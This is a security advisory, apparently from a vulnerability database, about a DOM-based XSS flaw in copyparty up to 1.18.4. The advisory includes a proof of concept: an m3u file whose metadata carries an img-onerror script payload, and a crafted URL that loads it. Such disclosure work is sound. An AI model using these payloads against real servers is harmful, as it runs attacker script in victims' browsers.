Описание
copyparty has DOM-Based XSS vulnerability when displaying multimedia metadata
Summary
An unauthenticated attacker is able to execute arbitrary JavaScript code in a victim's browser due to improper sanitization of multimedia tags in music files, including m3u files.
Details
Multimedia metadata is rendered in the web-app without sanitization. This can be exploited in two ways:
- a user which has the necessary permission for uploading files can upload a song with an artist-name such as
<img src=x onerror=alert(document.domain)> - an unauthenticated user can trick another user into clicking a malicious URL, performing this same exploit using an externally-hosted m3u file
The CVE score and PoC is based on the m3u approach, which results in a higher severity.
PoC
-
Create a file named
song.m3uwith the following content. Host this file on an attacker-controlled web server.#EXTM3U #EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)> http://example.com/audio.mp3 -
Craft and share the malicious URL:
http://127.0.0.1:3923/#m3u=https://example.com/song.m3u
Impact
Any user that accesses this malicious URL is impacted.
Пакеты
copyparty
<= 1.18.4
1.18.5
Связанные уязвимости
copyparty is a portable file server. In versions up to and including versions 1.18.4, an unauthenticated attacker is able to execute arbitrary JavaScript code in a victim's browser due to improper sanitization of multimedia tags in music files, including m3u files. This is fixed in version 1.18.5.